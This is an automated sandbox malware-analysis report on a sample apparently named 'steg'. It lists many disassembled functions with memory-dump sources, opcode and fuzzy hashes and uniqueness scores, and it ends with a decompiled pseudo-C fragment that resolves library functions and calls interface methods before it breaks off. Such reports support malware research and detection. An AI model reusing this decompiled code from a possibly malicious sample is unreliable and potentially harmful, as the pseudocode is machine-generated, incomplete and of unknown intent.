                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 349ee9f934f086eeae8ee442952babe80b665de1b3249808d41fe73a0ed58498
                                                                                                                    • Instruction ID: 5f211d1e6197699c3ba344d45410934eb33e961999e40e799b77fb916eac36ae
                                                                                                                    • Opcode Fuzzy Hash: 349ee9f934f086eeae8ee442952babe80b665de1b3249808d41fe73a0ed58498
                                                                                                                    • Instruction Fuzzy Hash: CE326C75F022698FDB258F58DD80AEDB7F5FB46314F0845D9E44AA3A90D3309A80CF96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FF4D00 Relevance: 3.5, APIs: 2, Instructions: 537COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78aa155812080a603e29f67e9920f32b7df3210302f44b008b7ce2c80a0c98e6
                                                                                                                    • Instruction ID: b23751d3bb8a98d4247e4c3b862a9a399d67403271672a72d432bc5f3320f985
                                                                                                                    • Opcode Fuzzy Hash: 78aa155812080a603e29f67e9920f32b7df3210302f44b008b7ce2c80a0c98e6
                                                                                                                    • Instruction Fuzzy Hash: FA327E75E026698BCB24CF14DC90AE9B7B5FF06711F1800D9E60AE7AA5D7309E80DF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FE4987 Relevance: 3.2, APIs: 2, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE49F3
                                                                                                                    • _memset.LIBCMT ref: 00FE4B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 121741435-0
                                                                                                                    • Opcode ID: 42e6bb1d75b3469deb19a935282b94fcb824250195043ac9094cdaaf469babcc
                                                                                                                    • Instruction ID: 3f64ac55c447a280741d97aebb9e22c1431f92939e6af59ce954ecf6309d6b00
                                                                                                                    • Opcode Fuzzy Hash: 42e6bb1d75b3469deb19a935282b94fcb824250195043ac9094cdaaf469babcc
                                                                                                                    • Instruction Fuzzy Hash: D9719F71A007808FCB28CF6AC88075BBBF5AF55310F14856EE986DB752D234F955CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FCFAC7 Relevance: 3.0, APIs: 1, Instructions: 1503COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2102423945-0
                                                                                                                    • Opcode ID: 50be7b101a02531a1639692697344ef2145a4d0a8ad0057f3b5311b4a1f0b25a
                                                                                                                    • Instruction ID: ea30c319a5a4717d4f37e5a65ee0281a44b4ebc136b543808db40caca0061782
                                                                                                                    • Opcode Fuzzy Hash: 50be7b101a02531a1639692697344ef2145a4d0a8ad0057f3b5311b4a1f0b25a
                                                                                                                    • Instruction Fuzzy Hash: 5EE28BB0D006099FDB20DF58C841FAABBB2FF04310F19815EE945AB352EB36A955DF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F9F4F7 Relevance: .5, Instructions: 546COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74fc225193d2fcd2492ad99b3fa51e614537585299d2d69160c6af7551baa05c
                                                                                                                    • Instruction ID: 48bd1672c7f40bb7e6bb348c59839220e72b83f5754c0ee7dfece4d3af2ede22
                                                                                                                    • Opcode Fuzzy Hash: 74fc225193d2fcd2492ad99b3fa51e614537585299d2d69160c6af7551baa05c
                                                                                                                    • Instruction Fuzzy Hash: 4522BE32D10A099FEF12CF64C851BAEB7B5EF59390F108369F819BB251D7309991EB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FE3A57 Relevance: .5, Instructions: 533COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aa6b9ca7db1edd256123ef1383d0c3ade037457d89732f58ea25e80a2cff7e73
                                                                                                                    • Instruction ID: 02feae4f5d337f5057af3050cec1b66b380812987318514cfebe21b9492e9798
                                                                                                                    • Opcode Fuzzy Hash: aa6b9ca7db1edd256123ef1383d0c3ade037457d89732f58ea25e80a2cff7e73
                                                                                                                    • Instruction Fuzzy Hash: 3502DD71E002859BDB24DF6ACC89BAEB7E4EF84320F14843EE91AD7210D735EA45DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FDE077 Relevance: .4, Instructions: 399COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f3f17e3bb29ab2aa90c3ff927ac163ecfe95207bb36a10f2979e4761c0980c0e
                                                                                                                    • Instruction ID: e4eefa94a7eecbddec356da7bc4778eaed91d272f1d3a962b3fe82c4d1389987
                                                                                                                    • Opcode Fuzzy Hash: f3f17e3bb29ab2aa90c3ff927ac163ecfe95207bb36a10f2979e4761c0980c0e
                                                                                                                    • Instruction Fuzzy Hash: 28D13F63D196904FEB1A5A38C8E53B97F93DB62320F1D46AED9960F7C3C0194A04F7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8FB27 Relevance: .4, Instructions: 360COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bbfb95534cc95ffb30ad9b5b729bed6e73357d8da729098431388fa784bdc3ae
                                                                                                                    • Instruction ID: 557be857355613394398edb6349ae4e67d33410739ee5d827ff976ec32187931
                                                                                                                    • Opcode Fuzzy Hash: bbfb95534cc95ffb30ad9b5b729bed6e73357d8da729098431388fa784bdc3ae
                                                                                                                    • Instruction Fuzzy Hash: 81E198319042D98FDB19CF6D88504ADFFF1AF95201748C69EE8A9DB343C638DA15DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FA7C87 Relevance: .2, Instructions: 227COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 23149b4ebce7d950949a55c311066e5b2dfebb6d768f32a87b45787ff06e7f9b
                                                                                                                    • Instruction ID: dbaac8b1df4835ea1487dcdfc99e0fce57823159cd54290f791066ec4dc1585d
                                                                                                                    • Opcode Fuzzy Hash: 23149b4ebce7d950949a55c311066e5b2dfebb6d768f32a87b45787ff06e7f9b
                                                                                                                    • Instruction Fuzzy Hash: F08106B1A043859FCB15DF68CC81E697FF1AF96310B0841D9E9949B703D63AED12DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8FFF7 Relevance: .2, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b27c8ab85ad0cc720f2c9900db5724e9a13dec27a49ff19823bacb5b6e5ac40d
                                                                                                                    • Instruction ID: 1be84fffd4a26f25ff51be4ad8f18194c057a0ad549f8629b8a01e2a3dd28efd
                                                                                                                    • Opcode Fuzzy Hash: b27c8ab85ad0cc720f2c9900db5724e9a13dec27a49ff19823bacb5b6e5ac40d
                                                                                                                    • Instruction Fuzzy Hash: 53619477A305548BCB08DF1DFC925567361FB9D34034A812AE91ACF360DA35EA53DB84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F90397 Relevance: .2, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12d050706e089bd3608bfbd213e1595aff85aa26bb28062c8d82d2d56b3b5fa6
                                                                                                                    • Instruction ID: 0e28fbcb933ded50d0b043bb9bca97b5f43af3931e18265c9617ad3a704f0448
                                                                                                                    • Opcode Fuzzy Hash: 12d050706e089bd3608bfbd213e1595aff85aa26bb28062c8d82d2d56b3b5fa6
                                                                                                                    • Instruction Fuzzy Hash: 29511433F149600BE71C8A698C7537D6AC3C7C4350B59827DEA5B9B3C6C8B89912D3D8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FC64F7 Relevance: .2, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 09722e71eca405e7c3236c0f52763bb88baa2cee24ee617e4bd308229a0725e3
                                                                                                                    • Instruction ID: 39ef2f41af66b21c25fb9c8071f276ca499c9b926ffe15c62209c65f98f4cb14
                                                                                                                    • Opcode Fuzzy Hash: 09722e71eca405e7c3236c0f52763bb88baa2cee24ee617e4bd308229a0725e3
                                                                                                                    • Instruction Fuzzy Hash: 9C51C2716052189ED708CF6DD9826A4BFE0EF4A354B08C1AEEC6CCF741D672C512EB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FAB6E7 Relevance: .2, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31807a09f6296503c6175b0f05a735e7bf678f5af54a24c58aba6f40ca7d0665
                                                                                                                    • Instruction ID: 3023804ad15dc5f7c864c9c628fc8edb0cd4fd60d4f1f0d63f0b3446d8642609
                                                                                                                    • Opcode Fuzzy Hash: 31807a09f6296503c6175b0f05a735e7bf678f5af54a24c58aba6f40ca7d0665
                                                                                                                    • Instruction Fuzzy Hash: D851B6616082D54FCB1DCF2C88A0579FFE0AE56201B0C82DEECE6DB283D529C955D7B0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F90287 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2458c508756f6d605595ca4ddac3219c8483b5ebe054fae0fa957fc0e8d14a5e
                                                                                                                    • Instruction ID: c2cabf72f31c1a8eafc980250e882236a3b48656cceb89c38ad5a0411045ee38
                                                                                                                    • Opcode Fuzzy Hash: 2458c508756f6d605595ca4ddac3219c8483b5ebe054fae0fa957fc0e8d14a5e
                                                                                                                    • Instruction Fuzzy Hash: BC21B53372043517E398E9388C0676BB2D2DFC8660B19C335FA65D7681ED68E922D2C0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8FA17 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b485e9a53aba50fb192f51002a8d22ea180cdd92eeaf9df50a96ff4b5a5567
                                                                                                                    • Instruction ID: 2a0685cde129941ab18a77ff975cb7ef1187b1dbc45f33d095cd2d0444ff54ab
                                                                                                                    • Opcode Fuzzy Hash: b7b485e9a53aba50fb192f51002a8d22ea180cdd92eeaf9df50a96ff4b5a5567
                                                                                                                    • Instruction Fuzzy Hash: 4321B23372043517E398E9388C0676BB2D2DFC86A0B19C335FA65D7681ED68E922D2C0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FCDC27 Relevance: .1, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 987bc33db043bd9ae01d71773e5cd1eb36112b2809b31610b555a86cc1fb9a57
                                                                                                                    • Instruction ID: 97f475a98f8e3138c5d4028cbfebf8dfee15451dd22effcb948a60e42ecbadba
                                                                                                                    • Opcode Fuzzy Hash: 987bc33db043bd9ae01d71773e5cd1eb36112b2809b31610b555a86cc1fb9a57
                                                                                                                    • Instruction Fuzzy Hash: C4317851E19BDA8BC7009A39C9513DBBFC1DB92315F24C7BCD0A987BC9D624B409D380
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FE7FC7 Relevance: .1, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                    • Instruction ID: 851da1c1503f05b8f05af9efde5e772c3cbb273b1552a29807a6ddc0778adc1b
                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                    • Instruction Fuzzy Hash: 87115B776001C187D624A63FD4B42F7E785EBC53B0B2C427AD3494B758DE62D90EB600
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033719A8 Relevance: .1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0cfc747fb71f2e8055bca4d7af6913420c5489aabee5a23f36ac19a834ea36cc
                                                                                                                    • Instruction ID: 30f0f3811de77b97c14dba6c5069a38ff081873dd9619a4cff526dfcb092cdec
                                                                                                                    • Opcode Fuzzy Hash: 0cfc747fb71f2e8055bca4d7af6913420c5489aabee5a23f36ac19a834ea36cc
                                                                                                                    • Instruction Fuzzy Hash: 9D212570D01209EFCB14DFA8C984BEDBBB6BF45304F1491AA9805AB391CB749F85CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033719B8 Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7791c2b89608d33362300b34c5ce9758ddee5558be09aded6eda28e73b04786e
                                                                                                                    • Instruction ID: 5c6a0501af85d7635bb00634a6f0e8dd65cda4ed25764d03a10b79f9d778156d
                                                                                                                    • Opcode Fuzzy Hash: 7791c2b89608d33362300b34c5ce9758ddee5558be09aded6eda28e73b04786e
                                                                                                                    • Instruction Fuzzy Hash: 6921E570E01209EFCB14DFA8C984BEEBBF6BF45305F5491A9940567391CB749B85CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03370728 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction ID: bee97537fcfcbb8a1a302e052803629466cb206417e9172dec49c3eded5ec439
                                                                                                                    • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction Fuzzy Hash: 10B09236E040089ADB108FC4F4813FCF774E7C2229F102063D218B3940823582684A89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03371800 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction ID: 89b8d4bcdf1e04ac2cd44f8601b3f7ea00b6b1e4165220fffb24eb86deede202
                                                                                                                    • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction Fuzzy Hash: 4CB09237E04008DADB108EC4B4823FDF778E782229F102063D229B3900823582694689
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033714C8 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction ID: 92f9d20775d5691510ec7c993180f1e3faa0d9fa3c2ae04a6d145a05383db9e3
                                                                                                                    • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                                    • Instruction Fuzzy Hash: 3EB0923BE040089ADB208EC4B4813FDF774E782229F102167C218B3900823982A84A89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8DF27 Relevance: 30.5, APIs: 20, Instructions: 460COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 53%
                                                                                                                    			E00F8DF27() {
				char _v8;
				char _v16;
				signed int _v20;
				char _v84;
				long _v1108;
				long _v2132;
				char _v3156;
				char _v4180;
				long _v5204;
				char _v6228;
				char _v6244;
				char _v6260;
				void* _v6264;
				char _v6268;
				void* _v6272;
				char _v6276;
				void* _v6280;
				char _v6284;
				void* _v6288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				intOrPtr* _t119;
				intOrPtr* _t123;
				void* _t127;
				intOrPtr* _t130;
				intOrPtr* _t137;
				char _t138;
				intOrPtr* _t139;
				intOrPtr* _t143;
				intOrPtr* _t145;
				void* _t164;
				char _t168;
				void* _t172;
				void* _t174;
				void* _t179;
				void* _t198;
				char* _t200;
				signed char _t213;
				void* _t223;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t227;
				void* _t255;
				intOrPtr* _t256;
				void* _t257;
				char* _t258;
				void* _t259;
				char* _t260;
				void* _t261;
				char* _t262;
				signed int _t263;
				void* _t264;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;

				E00FE7307(0x1880);
				_t115 =  *0x481f80 ^ _t263;
				_v20 = _t115;
				 *[fs:0x0] =  &_v16;
				_v6264 = 0;
				_v8 = 0;
				_t260 =  *0x4700f4(0x470520, _t115, _t255, _t259, _t223,  *[fs:0x0], 0x46fccc, 0xffffffff);
				if(_t260 != 0) {
					_t256 =  *0x470110(_t260, 0x47052c);
					if(_t256 != 0) {
						_t119 = _v6264;
						if(_t119 != 0) {
							 *((intOrPtr*)( *_t119 + 8))(_t119);
						}
						_push(0);
						_push(0);
						_push(0);
						_push( &_v6264);
						_v6264 = 0;
						if( *_t256() < 0) {
							L4:
							 *0x470114(_t260);
							goto L61;
						} else {
							_t258 = _v6264;
							_v8 = 1;
							_v6268 = 0;
							if(_t258 != 0) {
								L10:
								_push( &_v6268);
								_push(0);
								_push(0);
								_push(_t258);
								if( *((intOrPtr*)( *_t258 + 0x38))() >= 0) {
									_t127 = _v6268;
									if(_t127 == 0) {
										goto L9;
									}
									_t225 =  *0x470100;
									while(1) {
										L15:
										_push(0);
										_t254 =  &_v6244;
										_push( &_v6244);
										_push(1);
										_push(_t127);
										if( *((intOrPtr*)( *_t127 + 0xc))() != 0) {
											break;
										}
										asm("movq xmm0, [ebp-0x1860]");
										asm("movq [eax], xmm0");
										asm("movq xmm0, [ebp-0x1858]");
										asm("movq [eax+0x8], xmm0");
										swprintf( &_v5204, 0x400, 0x470544);
										_t264 = _t264 - 0x10 + 0x1c;
										_t260 = _v6264;
										_v8 = 2;
										_v6280 = 0;
										if(_t260 == 0) {
											goto L9;
										}
										_push( &_v6280);
										_push(0);
										_push( &_v6244);
										_push(0);
										_push(_t260);
